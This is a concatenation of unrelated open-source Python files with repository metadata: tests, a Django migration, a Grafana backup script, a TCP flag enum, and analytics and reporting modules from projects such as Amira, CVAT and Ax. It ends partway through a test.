data_size_widget: boolean
flag to determine whether to diplay the current datapoints
selected in the dashboard, default True
warnings: boolean
flag to disable or enable runtime warnings related to layouts,
default False
Examples
--------
>>> import cudf
>>> import cuxfilter
>>> from cuxfilter.charts import bokeh
>>> df = cudf.DataFrame(
>>> {
>>> 'key': [0, 1, 2, 3, 4],
>>> 'val':[float(i + 10) for i in range(5)]
>>> }
>>> )
>>> cux_df = cuxfilter.DataFrame.from_dataframe(df)
>>> line_chart_1 = bokeh.line(
>>> 'key', 'val', data_points=5, add_interaction=False
>>> )
>>> # create a dashboard object
>>> d = cux_df.dashboard([line_chart_1])
Returns
-------
cuxfilter.DashBoard object
"""
if notebook_assets.pn.config.js_files == {}:
notebook_assets.load_notebook_assets()
return DashBoard(
charts=charts,
sidebar=sidebar,
dataframe=self,
layout=layout,
theme=theme,
title=title,
data_size_widget=data_size_widget,
show_warnings=warnings,
layout_array=layout_array,
)
|
4d9abfa9a9599741644d33bd28a5ee51aa22041b
|
6dac93330696c2d2c630343c1b284f464909922a
|
/tests/sqs_test.py
|
f420a5e599f237873478ec23f311244f7bb1812a
|
[
"MIT"
] |
permissive
|
Yelp/amira
|
2a4f2d9e42baf75c6da85abd2a70301f00f0c2af
|
0390d7969fdd64cda36996baf896d50d47648c80
|
refs/heads/master
| 2023-08-28T14:24:31.208162
| 2021-09-06T11:59:37
| 2021-09-06T11:59:37
| 63,352,231
| 163
| 49
|
MIT
| 2023-03-24T10:12:09
| 2016-07-14T16:25:40
|
Python
|
UTF-8
|
Python
| false
| false
| 3,871
|
py
|
sqs_test.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
import simplejson
from mock import MagicMock
from mock import patch
from amira.sqs import SqsHandler
TEST_DATA_DIR_PATH = 'tests/data'
@pytest.fixture
def sqs_handler():
with patch('amira.sqs.boto3') as mock_boto3:
handler = SqsHandler('us-west-1', 'godzilla')
mock_boto3.resource.assert_called_once_with('sqs', region_name='us-west-1')
mock_boto3.resource.return_value.get_queue_by_name.assert_called_once_with(
QueueName='godzilla',
)
yield handler
def read_s3_event_notifications_file(s3_event_notifications_file_path):
with open(s3_event_notifications_file_path) as fp:
s3_event_notifications = simplejson.load(fp)
json_s3_event_notifications = [
simplejson.dumps(s3_event_notification)
for s3_event_notification in s3_event_notifications
]
return json_s3_event_notifications
def create_s3_event_notification_message_mocks(s3_event_notifications_file_name):
"""Creates SQS queue message mocks that will return the JSON content of
`s3_event_notifications_file_path` JSON file as the body of the message.
"""
s3_event_notifications_file_path = '{0}/{1}'.format(
TEST_DATA_DIR_PATH, s3_event_notifications_file_name,
)
json_s3_event_notifications = read_s3_event_notifications_file(
s3_event_notifications_file_path,
)
return [
MagicMock(body=json_s3_event_notification)
for json_s3_event_notification in json_s3_event_notifications
]
def mock_s3_event_notifications(
mock_sqs_queue, s3_event_notifications_file_name,
):
"""`SqsHandler.get_created_objects()` is a generator, so we need to
mock multiple values returned by `get_messages()` method.
In this case only one as the test cases do not operate on more than
one message.
"""
s3_event_notification_message_mocks = create_s3_event_notification_message_mocks(
s3_event_notifications_file_name,
)
mock_sqs_queue.receive_messages.side_effect = [s3_event_notification_message_mocks]
return s3_event_notification_message_mocks
class TestSqsHandler(object):
def test_get_created_objects(self, sqs_handler):
s3_event_notification_message_mocks = mock_s3_event_notifications(
sqs_handler.sqs_queue, 's3_event_notifications.json',
)
created_objects = sqs_handler.get_created_objects()
actual_key_names = [
created_object.key_name
for created_object in created_objects
]
assert actual_key_names == [
'AMIRA-1561-2016_01_11-10_54_07.tar.gz',
'AMIRA-1562-2016_01_11-10_54_47.tar.gz',
'AMIRA-1563-2016_01_11-10_54_58.tar.gz',
'AMIRA-1564-2016_01_11-10_55_12.tar.gz',
'AMIRA-1565-2016_01_11-10_55_32.tar.gz',
'AMIRA-1566-2016_01_11-10_55_49.tar.gz',
'AMIRA-1567-2016_01_11-10_56_09.tar.gz',
]
for message_mock in s3_event_notification_message_mocks:
message_mock.delete.assert_called_once_with()
def test_get_created_objects_no_created_objects(self, sqs_handler):
sqs_handler.sqs_queue.receive_messages.side_effect = [[]]
created_objects = sqs_handler.get_created_objects()
assert not list(created_objects)
def test_get_created_objects_no_records(self, sqs_handler):
"""Tests the behavior of `get_created_objects()` method in case
the message received from SQS does not contain the "Records"
field in the message body.
"""
mock_s3_event_notifications(
sqs_handler.sqs_queue, 's3_test_event_notification.json',
)
assert not list(sqs_handler.get_created_objects())
|
1a1e63ba3aaa7727fecf982f1472c656f40ac6a9
|
8fa191cd4a67431a04eff62d35122ee83cc7b0af
|
/bookwyrm/migrations/0110_auto_20211015_1734.py
|
ed7dd43c0be550b6152c9ebf6ed7c31dfa56ffe2
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
bookwyrm-social/bookwyrm
|
24678676a7a58dba96641194dfae3fffbf01574d
|
0f8da5b738047f3c34d60d93f59bdedd8f797224
|
refs/heads/main
| 2023-08-20T21:45:30.957277
| 2023-08-19T23:41:50
| 2023-08-19T23:41:50
| 236,415,735
| 1,398
| 216
|
NOASSERTION
| 2023-09-08T20:43:06
| 2020-01-27T03:51:54
|
Python
|
UTF-8
|
Python
| false
| false
| 563
|
py
|
0110_auto_20211015_1734.py
|
# Generated by Django 3.2.5 on 2021-10-15 17:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bookwyrm", "0109_status_edited_date"),
]
operations = [
migrations.AddField(
model_name="quotation",
name="raw_quote",
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name="status",
name="raw_content",
field=models.TextField(blank=True, null=True),
),
]
|
a8cacb8b261bae9d1ac16c29f495d7f4ad4903f8
|
3982e6daf88e453c726f6b39a081fc37ce15a08a
|
/discovery-provider/src/queries/get_sol_user_bank.py
|
13af2d58935756e8fae9c93ef3d58bd1de2129ce
|
[
"Apache-2.0"
] |
permissive
|
AudiusProject/audius-protocol
|
45808e11082608ad5b76a425d287cb6d94a6dab0
|
7cf1d8e378520460d24a7cc8c29e9927c0944cb3
|
refs/heads/main
| 2023-08-09T10:34:28.850436
| 2023-08-09T04:28:17
| 2023-08-09T04:28:17
| 201,821,771
| 531
| 108
|
NOASSERTION
| 2023-09-14T21:27:52
| 2019-08-11T22:31:43
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 3,373
|
py
|
get_sol_user_bank.py
|
import logging
from datetime import datetime
from typing import Dict, Optional, TypedDict
from redis import Redis
from sqlalchemy import desc
from src.models.users.user_bank import UserBankTx
from src.tasks.index_user_bank import cache_latest_sol_user_bank_db_tx
from src.utils import helpers
from src.utils.cache_solana_program import (
CachedProgramTxInfo,
get_cache_latest_sol_program_tx,
get_latest_sol_db_tx,
)
from src.utils.db_session import get_db_read_replica
from src.utils.redis_constants import (
latest_sol_user_bank_db_tx_key,
latest_sol_user_bank_program_tx_key,
)
logger = logging.getLogger(__name__)
# Get last user_bank sol tx
def get_latest_sol_user_bank() -> Optional[Dict]:
db = get_db_read_replica()
with db.scoped_session() as session:
user_bank_tx = session.query(UserBankTx).order_by(desc(UserBankTx.slot)).first()
if user_bank_tx:
return helpers.model_to_dictionary(user_bank_tx)
return None
# Retrieve the latest stored value in database for sol plays
# Cached during processing
def get_latest_cached_sol_user_bank_db(redis: Redis) -> Optional[CachedProgramTxInfo]:
latest_sol_user_bank_db = get_cache_latest_sol_program_tx(
redis, latest_sol_user_bank_db_tx_key
)
if not latest_sol_user_bank_db:
# If nothing found in cache, pull from db
user_bank = get_latest_sol_user_bank()
if user_bank:
latest_sol_user_bank_db = {
"signature": user_bank["signature"],
"slot": user_bank["slot"],
"timestamp": int(user_bank["created_at"].timestamp()),
}
# If found, re-cache value to avoid repeated DB hits
if latest_sol_user_bank_db:
cache_latest_sol_user_bank_db_tx(redis, latest_sol_user_bank_db)
return latest_sol_user_bank_db
def get_latest_cached_sol_user_bank_program_tx(redis) -> CachedProgramTxInfo:
# Latest user_bank tx from chain
latest_sol_user_bank_program_tx = get_latest_sol_db_tx(
redis, latest_sol_user_bank_program_tx_key
)
return latest_sol_user_bank_program_tx
def get_sol_user_bank_health_info(redis: Redis, current_time_utc: datetime):
db_cache = get_latest_cached_sol_user_bank_db(redis)
tx_cache = get_latest_cached_sol_user_bank_program_tx(redis)
return get_sol_tx_health_info(current_time_utc, db_cache, tx_cache)
class SolTxHealthTxInfo(TypedDict):
chain_tx: Optional[CachedProgramTxInfo]
db_tx: Optional[CachedProgramTxInfo]
class SolTxHealthInfo(TypedDict):
slot_diff: int
tx_info: SolTxHealthTxInfo
time_diff: float
# Retrieve sol plays health object
def get_sol_tx_health_info(
current_time_utc: datetime,
db_cache: Optional[CachedProgramTxInfo],
tx_cache: Optional[CachedProgramTxInfo],
) -> SolTxHealthInfo:
time_diff = -1.0
slot_diff = -1
if db_cache and tx_cache:
slot_diff = tx_cache["slot"] - db_cache["slot"]
last_created_at_time = datetime.utcfromtimestamp(db_cache["timestamp"])
time_diff = (current_time_utc - last_created_at_time).total_seconds()
return_val: SolTxHealthInfo = {
"slot_diff": slot_diff,
"tx_info": {
"chain_tx": tx_cache,
"db_tx": db_cache,
},
"time_diff": time_diff,
}
return return_val
|
e25d983005690c6ee7536c0acf826a4f32c4217c
|
88c4d5b462998a9c0411a0243ab95ee05ffee60a
|
/tests/language/test_character_classes.py
|
c682b76a75c71be70cba0b80afbe824431d71836
|
[
"MIT"
] |
permissive
|
graphql-python/graphql-core
|
606f3f3d479d576a4bdcd7d7995c0fddc486282f
|
0c93b8452eed38d4f800c7e71cf6f3f3758cd1c6
|
refs/heads/main
| 2023-09-04T09:22:45.162575
| 2023-06-09T22:13:10
| 2023-06-09T22:13:10
| 143,207,933
| 259
| 101
|
MIT
| 2023-06-09T22:13:11
| 2018-08-01T20:57:07
|
Python
|
UTF-8
|
Python
| false
| false
| 2,414
|
py
|
test_character_classes.py
|
from string import ascii_letters as letters
from string import digits, punctuation
from graphql.language.character_classes import (
is_digit,
is_letter,
is_name_continue,
is_name_start,
)
non_ascii = "¯_±¹²³½£ºµÄäÖöØø×〇᧐〸αΑωΩ"
def describe_digit():
def accepts_digits():
assert all(is_digit(char) for char in digits)
def rejects_letters():
assert not any(is_digit(char) for char in letters)
def rejects_underscore():
assert not is_digit("_")
def rejects_punctuation():
assert not any(is_digit(char) for char in punctuation)
def rejects_non_ascii():
assert not any(is_digit(char) for char in non_ascii)
def rejects_empty_string():
assert not is_digit("")
def describe_letter():
def accepts_letters():
assert all(is_letter(char) for char in letters)
def rejects_digits():
assert not any(is_letter(char) for char in digits)
def rejects_underscore():
assert not is_letter("_")
def rejects_punctuation():
assert not any(is_letter(char) for char in punctuation)
def rejects_non_ascii():
assert not any(is_letter(char) for char in non_ascii)
def rejects_empty_string():
assert not is_letter("")
def describe_name_start():
def accepts_letters():
assert all(is_name_start(char) for char in letters)
def accepts_underscore():
assert is_name_start("_")
def rejects_digits():
assert not any(is_name_start(char) for char in digits)
def rejects_punctuation():
assert not any(is_name_start(char) for char in punctuation if char != "_")
def rejects_non_ascii():
assert not any(is_name_start(char) for char in non_ascii)
def rejects_empty_string():
assert not is_name_start("")
def describe_name_continue():
def accepts_letters():
assert all(is_name_continue(char) for char in letters)
def accepts_digits():
assert all(is_name_continue(char) for char in digits)
def accepts_underscore():
assert is_name_continue("_")
def rejects_punctuation():
assert not any(is_name_continue(char) for char in punctuation if char != "_")
def rejects_non_ascii():
assert not any(is_name_continue(char) for char in non_ascii)
def rejects_empty_string():
assert not is_name_continue("")
|
4297ca4fa0fcfd754d876803140b051cc6e42dca
|
ddcd3b340d26bf0e40c5ace7af9ef9bc93413bce
|
/grafana_backup/save_library_elements.py
|
882196de968515f3e09210f89c137a3a06c0ec4d
|
[
"MIT"
] |
permissive
|
ysde/grafana-backup-tool
|
afa61b55971ee7ce37775c4151e4dd35fc8e1207
|
48807793163792219a5f6b508424b8bb702a52f1
|
refs/heads/master
| 2023-08-30T00:42:52.765662
| 2023-07-28T02:29:17
| 2023-07-28T02:29:17
| 58,634,508
| 718
| 271
|
MIT
| 2023-09-08T19:45:39
| 2016-05-12T11:10:34
|
Python
|
UTF-8
|
Python
| false
| false
| 3,034
|
py
|
save_library_elements.py
|
import os
from grafana_backup.dashboardApi import search_library_elements
from grafana_backup.commons import to_python2_and_3_compatible_string, print_horizontal_line, save_json
def main(args, settings):
backup_dir = settings.get('BACKUP_DIR')
timestamp = settings.get('TIMESTAMP')
grafana_url = settings.get('GRAFANA_URL')
http_get_headers = settings.get('HTTP_GET_HEADERS')
verify_ssl = settings.get('VERIFY_SSL')
client_cert = settings.get('CLIENT_CERT')
debug = settings.get('DEBUG')
pretty_print = settings.get('PRETTY_PRINT')
folder_path = '{0}/library-elements/{1}'.format(backup_dir, timestamp)
log_file = 'library_elements_{0}.txt'.format(timestamp)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
library_elements = get_all_library_elements_in_grafana(grafana_url, http_get_headers, verify_ssl, client_cert, debug)
get_individual_library_elements_and_save(library_elements, folder_path, log_file, pretty_print)
print_horizontal_line()
def get_all_library_elements_in_grafana(grafana_url, http_get_headers, verify_ssl, client_cert, debug):
(status, content) = search_library_elements(grafana_url, http_get_headers, verify_ssl, client_cert, debug)
if status == 200:
library_elements = content['result']['elements']
print("There are {0} library element:".format(len(library_elements)))
for library_element in library_elements:
print("name: {0}".format(to_python2_and_3_compatible_string(library_element['name'])))
return library_elements
else:
print("query library elements failed, status: {0}, msg: {1}".format(status, content))
return []
def save_library_element(channel_name, file_name, alert_channel_setting, folder_path, pretty_print):
file_path = save_json(file_name, alert_channel_setting, folder_path, 'library_element', pretty_print)
print("library_element:{0} is saved to {1}".format(channel_name, file_path))
def get_individual_library_elements_and_save(library_elements, folder_path, log_file, pretty_print):
file_path = folder_path + '/' + log_file
if library_elements:
with open(u"{0}".format(file_path), 'w') as f:
for library_element in library_elements:
if 'uid' in library_element:
library_element_identifier = library_element['uid']
else:
library_element_identifier = library_element['id']
save_library_element(
to_python2_and_3_compatible_string(library_element['name']),
to_python2_and_3_compatible_string(str(library_element_identifier)),
library_element,
folder_path,
pretty_print
)
f.write('{0}\t{1}\n'.format(to_python2_and_3_compatible_string(str(library_element_identifier)),
to_python2_and_3_compatible_string(library_element['name'])))
|
fb1f1c629fb30de9533991881bb0d56df8fc739d
|
5c1746c4ae9f5eb4c94c9b3a70a4d3feb966ceda
|
/pcapkit/const/tcp/flags.py
|
6e917aa242bce3f11327f0fc24990083a99d8ed0
|
[
"BSD-3-Clause"
] |
permissive
|
JarryShaw/PyPCAPKit
|
8b53c76cf54f2ef1a9e4d0a7aeb3d52605dc1d5a
|
a6fe49ec58f09e105bec5a00fb66d9b3f22730d9
|
refs/heads/main
| 2023-08-29T12:49:58.611378
| 2023-08-28T14:05:43
| 2023-08-28T14:05:43
| 109,791,841
| 204
| 29
|
BSD-3-Clause
| 2023-09-11T17:09:06
| 2017-11-07T05:41:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,740
|
py
|
flags.py
|
# -*- coding: utf-8 -*-
# pylint: disable=line-too-long,consider-using-f-string
"""TCP Header Flags
======================
.. module:: pcapkit.const.tcp.flags
This module contains the constant enumeration for **TCP Header Flags**,
which is automatically generated from :class:`pcapkit.vendor.tcp.flags.Flags`.
"""
from typing import TYPE_CHECKING
from aenum import IntFlag
if TYPE_CHECKING:
from typing import Optional
__all__ = ['Flags']
class Flags(IntFlag):
"""[Flags] TCP Header Flags"""
#: Reserved for future use [:rfc:`9293`]
Reserved_4 = 1 << 4
#: Reserved for future use [:rfc:`9293`]
Reserved_5 = 1 << 5
#: Reserved for future use [:rfc:`9293`]
Reserved_6 = 1 << 6
#: Reserved for future use [:rfc:`8311`]
Reserved_7 = 1 << 7
#: CWR (Congestion Window Reduced) [:rfc:`3168`]
CWR = 1 << 8
#: ECE (ECN-Echo) [:rfc:`3168`]
ECE = 1 << 9
#: Urgent Pointer field is significant (URG) [:rfc:`9293`]
URG = 1 << 10
#: Acknowledgment field is significant (ACK) [:rfc:`9293`]
ACK = 1 << 11
#: Push Function (PSH) [:rfc:`9293`]
PSH = 1 << 12
#: Reset the connection (RST) [:rfc:`9293`]
RST = 1 << 13
#: Synchronize sequence numbers (SYN) [:rfc:`9293`]
SYN = 1 << 14
#: No more data from sender (FIN) [:rfc:`9293`]
FIN = 1 << 15
@staticmethod
def get(key: 'int | str', default: 'Optional[int]' = -1) -> 'Flags':
"""Backport support for original codes.
Args:
key: Key to get enum item.
default: Default value if not found.
:meta private:
"""
if isinstance(key, int):
return Flags(key)
return Flags[key] # type: ignore[misc]
|
b2799ce6dc4fab5441445584c1591157f2bbadf3
|
605d63d23bc2e07eb054979a14557d469787877e
|
/atest/testdata/standard_libraries/builtin/UseBuiltIn.py
|
311e7933907e7e2d400078cf72079214b1efb515
|
[
"Apache-2.0",
"CC-BY-3.0"
] |
permissive
|
robotframework/robotframework
|
407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf
|
cf896995f822f571c33dc5651d51365778b1cf40
|
refs/heads/master
| 2023-08-29T03:19:00.734810
| 2023-08-27T18:14:48
| 2023-08-28T18:14:11
| 21,273,155
| 8,635
| 2,623
|
Apache-2.0
| 2023-09-05T04:58:08
| 2014-06-27T11:10:38
|
Python
|
UTF-8
|
Python
| false
| false
| 559
|
py
|
UseBuiltIn.py
|
from robot.libraries.BuiltIn import BuiltIn
def log_debug_message():
b = BuiltIn()
b.set_log_level('DEBUG')
b.log('Hello, debug world!', 'DEBUG')
def get_test_name():
return BuiltIn().get_variables()['${TEST NAME}']
def set_secret_variable():
BuiltIn().set_test_variable('${SECRET}', '*****')
def use_run_keyword_with_non_unicode_values():
BuiltIn().run_keyword('Log', 42)
BuiltIn().run_keyword('Log', b'\xff')
def user_keyword_via_run_keyword():
BuiltIn().run_keyword("UseBuiltInResource.Keyword", 'This is x', 911)
|
9f7517f8817479dc890d077982bd9dad6f9a2e9b
|
3f31ff163eb82d915715f705e231ba3cc3bffc31
|
/test/dataset_transforms_lighting_transform_test.py
|
0c718627aa1b6bc26e58bec6aad5806aae44ab85
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
facebookresearch/ClassyVision
|
6b7ffb28c771579f56258f38aea0b012cbf95129
|
08a82e88fcfa143933832994ace2424c03dd43b8
|
refs/heads/main
| 2023-09-04T01:14:08.507494
| 2023-03-23T14:35:34
| 2023-03-23T14:35:34
| 208,358,969
| 1,673
| 321
|
MIT
| 2023-05-08T19:21:37
| 2019-09-13T22:54:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,192
|
py
|
dataset_transforms_lighting_transform_test.py
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
from classy_vision.dataset.core.random_image_datasets import (
RandomImageBinaryClassDataset,
)
from classy_vision.dataset.transforms.util import build_field_transform_default_imagenet
class LightingTransformTest(unittest.TestCase):
def get_test_image_dataset(self):
return RandomImageBinaryClassDataset(
crop_size=224, class_ratio=0.5, num_samples=100, seed=0
)
def test_lighting_transform_no_errors(self):
"""
Tests that the lighting transform runs without any errors.
"""
dataset = self.get_test_image_dataset()
config = [{"name": "ToTensor"}, {"name": "lighting"}]
transform = build_field_transform_default_imagenet(config)
sample = dataset[0]
try:
# test that lighting has been registered and runs without errors
transform(sample)
except Exception:
self.fail("LightingTransform raised an exception")
return
|
1bad7e1e6391eb568c5dccdadf11a1efa4fb3532
|
dac12c9178b13d60f401c4febff5569af8aa2719
|
/cvat/apps/analytics_report/report/get.py
|
82622e5921a1846ad4218351eceba4ac2d9b220b
|
[
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
opencv/cvat
|
39dc66ca20f972ba40b79c44d7ce43590dc0b0b5
|
899c9fd75146744def061efd7ab1b1c6c9f6942f
|
refs/heads/develop
| 2023-08-19T04:27:56.974498
| 2023-08-18T09:58:25
| 2023-08-18T09:58:25
| 139,156,354
| 6,558
| 1,887
|
MIT
| 2023-09-14T12:44:39
| 2018-06-29T14:02:45
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 6,117
|
py
|
get.py
|
# Copyright (C) 2023 CVAT.ai Corporation
#
# SPDX-License-Identifier: MIT
from datetime import datetime, timedelta, timezone
from dateutil import parser
from rest_framework import serializers, status
from rest_framework.exceptions import NotFound
from rest_framework.response import Response
from cvat.apps.analytics_report.models import AnalyticsReport, TargetChoice
from cvat.apps.analytics_report.report.create import get_empty_report
from cvat.apps.analytics_report.serializers import AnalyticsReportSerializer
from cvat.apps.engine.models import Job, Project, Task
def _filter_statistics_by_date(statistics, start_date, end_date):
for metric in statistics:
data_series = metric.get("data_series", {})
if metric.get("is_filterable_by_date", False):
for ds_name, ds_entry in data_series.items():
data_series[ds_name] = list(
filter(
lambda df: start_date <= parser.parse(df["datetime"]) <= end_date, ds_entry
)
)
return statistics
def _convert_datetime_to_date(statistics):
for metric in statistics:
data_series = metric.get("data_series", {})
for ds_entry in data_series.values():
for df in ds_entry:
df["date"] = parser.parse(df["datetime"]).date()
del df["datetime"]
return statistics
def _clamp_working_time(statistics):
affected_metrics = "annotation_speed"
for metric in statistics:
if metric["name"] not in affected_metrics:
continue
data_series = metric.get("data_series", {})
if data_series:
for df in data_series["working_time"]:
df["value"] = max(df["value"], 1)
return statistics
def _get_object_report(obj_model, pk, start_date, end_date):
try:
db_obj = obj_model.objects.get(pk=pk)
db_analytics_report = db_obj.analytics_report
except obj_model.DoesNotExist as ex:
raise NotFound(f"{obj_model.__class__.__name__} object with pk={pk} does not exist") from ex
except AnalyticsReport.DoesNotExist:
db_analytics_report = get_empty_report()
statistics = _filter_statistics_by_date(db_analytics_report.statistics, start_date, end_date)
statistics = _convert_datetime_to_date(statistics)
statistics = _clamp_working_time(statistics)
if obj_model is Job:
target = TargetChoice.JOB
elif obj_model is Task:
target = TargetChoice.TASK
elif obj_model is Project:
target = TargetChoice.PROJECT
data = {
"target": target,
f"{obj_model.__name__.lower()}_id": pk,
"statistics": statistics,
"created_date": db_analytics_report.created_date,
}
return data
def _get_job_report(job_id, start_date, end_date):
return _get_object_report(Job, int(job_id), start_date, end_date)
def _get_task_report(task_id, start_date, end_date):
return _get_object_report(Task, int(task_id), start_date, end_date)
def _get_project_report(project_id, start_date, end_date):
return _get_object_report(Project, int(project_id), start_date, end_date)
def get_analytics_report(request, query_params):
query_params = {
"project_id": query_params.get("project_id", None),
"task_id": query_params.get("task_id", None),
"job_id": query_params.get("job_id", None),
"start_date": query_params.get("start_date", None),
"end_date": query_params.get("end_date", None),
}
try:
if query_params["start_date"]:
query_params["start_date"] = parser.parse(query_params["start_date"])
except parser.ParserError:
raise serializers.ValidationError(
f"Cannot parse 'start_date' datetime parameter: {query_params['start_date']}"
)
try:
if query_params["end_date"]:
query_params["end_date"] = parser.parse(query_params["end_date"])
except parser.ParserError:
raise serializers.ValidationError(
f"Cannot parse 'end_date' datetime parameter: {query_params['end_date']}"
)
if (
query_params["start_date"]
and query_params["end_date"]
and query_params["start_date"] > query_params["end_date"]
):
raise serializers.ValidationError("'start_date' must be before than 'end_date'")
# Set the default time interval to last 30 days
if not query_params["start_date"] and not query_params["end_date"]:
query_params["end_date"] = datetime.now(timezone.utc)
query_params["start_date"] = query_params["end_date"] - timedelta(days=30)
elif query_params["start_date"] and not query_params["end_date"]:
query_params["end_date"] = datetime.now(timezone.utc)
elif not query_params["start_date"] and query_params["end_date"]:
query_params["end_date"] = datetime.min
job_id = query_params.get("job_id", None)
task_id = query_params.get("task_id", None)
project_id = query_params.get("project_id", None)
if job_id is None and task_id is None and project_id is None:
raise serializers.ValidationError("No any job, task or project specified")
if sum(map(bool, [job_id, task_id, project_id])) > 1:
raise serializers.ValidationError(
"Only one of job_id, task_id or project_id must be specified"
)
report = None
try:
if job_id is not None:
report = _get_job_report(job_id, query_params["start_date"], query_params["end_date"])
elif task_id is not None:
report = _get_task_report(task_id, query_params["start_date"], query_params["end_date"])
elif project_id is not None:
report = _get_project_report(
project_id, query_params["start_date"], query_params["end_date"]
)
except AnalyticsReport.DoesNotExist:
return Response("Analytics report not found", status=status.HTTP_404_NOT_FOUND)
serializer = AnalyticsReportSerializer(data=report)
serializer.is_valid(raise_exception=True)
return Response(serializer.data)
|
318ce53e5048fbe49072281aa40f3ccf073df94d
|
0dddc0508138396c740901be4a0f9eebefb8fded
|
/ax/service/tests/test_report_utils.py
|
d8c95ce5daad4956b8c24e3e6bb8c9d2fc6b739e
|
[
"MIT"
] |
permissive
|
facebook/Ax
|
473beb143016f95f4ec381ed1bd95b32c1ca31f8
|
6443cee30cbf8cec290200a7420a3db08e4b5445
|
refs/heads/main
| 2023-09-01T09:29:13.684709
| 2023-08-31T21:49:30
| 2023-08-31T21:49:30
| 169,880,381
| 2,207
| 315
|
MIT
| 2023-09-14T21:26:51
| 2019-02-09T15:23:44
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 20,763
|
py
|
test_report_utils.py
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
from collections import namedtuple
from logging import INFO, WARN
from typing import Dict, List
from unittest import mock
from unittest.mock import patch
import pandas as pd
from ax.core.arm import Arm
from ax.core.metric import Metric
from ax.core.objective import MultiObjective, Objective
from ax.core.optimization_config import MultiObjectiveOptimizationConfig
from ax.core.outcome_constraint import ObjectiveThreshold
from ax.core.types import ComparisonOp
from ax.modelbridge.registry import Models
from ax.service.utils.report_utils import (
_get_cross_validation_plots,
_get_curve_plot_dropdown,
_get_metric_name_pairs,
_get_objective_trace_plot,
_get_objective_v_param_plots,
_get_shortest_unique_suffix_dict,
_objective_vs_true_objective_scatter,
compute_maximum_map_values,
exp_to_df,
Experiment,
FEASIBLE_COL_NAME,
get_standard_plots,
plot_feature_importance_by_feature_plotly,
)
from ax.utils.common.testutils import TestCase
from ax.utils.common.typeutils import checked_cast
from ax.utils.testing.core_stubs import (
get_branin_experiment,
get_branin_experiment_with_multi_objective,
get_branin_experiment_with_timestamp_map_metric,
get_experiment_with_observations,
get_high_dimensional_branin_experiment,
get_multi_type_experiment,
get_test_map_data_experiment,
)
from ax.utils.testing.mock import fast_botorch_optimize
from ax.utils.testing.modeling_stubs import get_generation_strategy
from plotly import graph_objects as go
OBJECTIVE_NAME = "branin"
PARAMETER_COLUMNS = ["x1", "x2"]
FLOAT_COLUMNS: List[str] = [OBJECTIVE_NAME] + PARAMETER_COLUMNS
EXPECTED_COLUMNS: List[str] = [
"trial_index",
"arm_name",
"trial_status",
"generation_method",
] + FLOAT_COLUMNS
DUMMY_OBJECTIVE_MEAN = 1.2345
DUMMY_SOURCE = "test_source"
DUMMY_MAP_KEY = "test_map_key"
TRUE_OBJECTIVE_NAME = "other_metric"
TRUE_OBJECTIVE_MEAN = 2.3456
DUMMY_MSG = "test_message"
class ReportUtilsTest(TestCase):
@patch(
"ax.service.utils.report_utils._merge_results_if_no_duplicates",
autospec=True,
return_value=pd.DataFrame(
[
# Trial indexes are out-of-order.
{"arm_name": "a", "trial_index": 1},
{"arm_name": "b", "trial_index": 2},
{"arm_name": "c", "trial_index": 0},
]
),
)
def test_exp_to_df_row_ordering(self, _) -> None:
"""
This test verifies that the returned data frame indexes are
in the same order as trial index. It mocks _merge_results_if_no_duplicates
to verify just the ordering of items in the final data frame.
"""
exp = get_branin_experiment(with_trial=True)
df = exp_to_df(exp)
# Check that all 3 rows are in order
self.assertEqual(len(df), 3)
for idx, row in df.iterrows():
self.assertEqual(row["trial_index"], idx)
@patch(
"ax.service.utils.report_utils._merge_results_if_no_duplicates",
autospec=True,
return_value=pd.DataFrame(
[
# Trial indexes are out-of-order.
{
"col1": 1,
"arm_name": "a",
"trial_status": "FAILED",
"generation_method": "Manual",
"trial_index": 1,
},
{
"col1": 2,
"arm_name": "b",
"trial_status": "COMPLETED",
"generation_method": "BO",
"trial_index": 2,
},
{
"col1": 3,
"arm_name": "c",
"trial_status": "COMPLETED",
"generation_method": "Manual",
"trial_index": 0,
},
]
),
)
def test_exp_to_df_col_ordering(self, _) -> None:
"""
This test verifies that the returned data frame indexes are
in the same order as trial index. It mocks _merge_results_if_no_duplicates
to verify just the ordering of items in the final data frame.
"""
exp = get_branin_experiment(with_trial=True)
df = exp_to_df(exp)
self.assertListEqual(
list(df.columns),
["trial_index", "arm_name", "trial_status", "generation_method", "col1"],
)
def test_exp_to_df_max_map_value(self) -> None:
exp = get_test_map_data_experiment(num_trials=3, num_fetches=5, num_complete=0)
def compute_maximum_map_values_timestamp(
experiment: Experiment,
) -> Dict[int, float]:
return compute_maximum_map_values(
experiment=experiment, map_key="timestamp"
)
df = exp_to_df(
exp=exp,
additional_fields_callables={ # pyre-ignore
"timestamp": compute_maximum_map_values_timestamp
},
)
self.assertEqual(df["timestamp"].tolist(), [5.0, 5.0, 5.0])
def test_exp_to_df_trial_timing(self) -> None:
# 1. test all have started, none have completed
exp = get_test_map_data_experiment(num_trials=3, num_fetches=5, num_complete=0)
df = exp_to_df(
exp=exp,
trial_attribute_fields=["time_run_started", "time_completed"],
always_include_field_columns=True,
)
self.assertTrue("time_run_started" in list(df.columns))
self.assertTrue("time_completed" in list(df.columns))
# since all trials started, all should have values
self.assertFalse(any(df["time_run_started"].isnull()))
# since no trials are complete, all should be None
self.assertTrue(all(df["time_completed"].isnull()))
# 2. test some trials not started yet
exp.trials[0]._time_run_started = None
df = exp_to_df(
exp=exp, trial_attribute_fields=["time_run_started", "time_completed"]
)
# the first trial should have NaN for rel_time_run_started
self.assertTrue(df["time_run_started"].isnull().iloc[0])
